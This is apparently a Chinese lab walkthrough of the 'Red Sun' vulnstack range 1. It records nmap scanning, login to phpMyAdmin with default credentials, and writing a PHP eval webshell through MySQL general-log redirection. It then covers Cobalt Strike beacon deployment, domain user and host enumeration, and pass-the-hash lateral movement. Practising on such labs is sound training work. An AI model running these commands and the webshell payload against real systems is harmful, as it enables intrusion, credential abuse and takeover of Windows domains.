打靶记录-红日靶场1
靶机地址
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
按照网络拓扑搭建好环境
确认靶机
nmap -sn 192.168.161.0/24
扫开放端口
nmap -sT -p- 192.168.161.128 -oA ./ports
扫详细信息
nmap -sT -sC -sV -O 192.168.161.128 -p80,3306 -oA ./details
nmap --script=vuln -p80,3306 192.168.161.128 -oA ./vuln
web渗透
访问192.168.161.128:80,是一个phpstudy探针
输入root/root显示数据库连接成功,说明mysql用的默认口令,上面扫描结果中显示有phpmyadmin,直接拼接访问
利用默认密码登录到phpmyadmin
尝试写webshell,SHOW VARIABLES LIKE "secure_file_priv"
查看可写文件夹
禁止写入,尝试日志写shell,select version()
mysql5.0版本以上会创建日志文件,可以通过修改日志的全局变量getshell
SHOW VARIABLES LIKE 'general%'
set global general_log = "ON";
开启日志保存
日志保存的默认地址是:C:\phpStudy\MySQL\data\stu1.log。在这里可以找到绝对路径C:\phpStudy。查看探针,得到web绝对地址
set global general_log_file='C:/phpStudy/WWW/shell.php';
select '<?php eval($_POST[cmd]);?>';
用蚁剑连接
内网渗透
ipconfig
,查看当前主机网卡
想了下还是用cs来测试方便点。先用cs生成后门,利用webshell上传然后执行就行了。
右键选择net view
选择elevate提权
ipconfig /all
,存在域
net config Workstation
shell net user /domain
,查看域控机器名跟域内用户名
右键port scan,查看内网存活ip跟端口开放情况。剩下的存活分别是192.168.52.138和192.168.52.141
ping一下域控,得到域控ip
shell wmic useraccount get /all
,获取域内用户的详细信息
总结:
域名god.org
域内5用户:Administrator,Guest,krbtgt,ligang,liukaifeng01
域内3主机:stu1(192.168.52.143),owa(域控-192.168.52.138),ROOT-TVI862UBEH(192.168.52.141)
新建一个监听器,payload选择Beacon SMB,然后再派生,哈希传递就全上线了。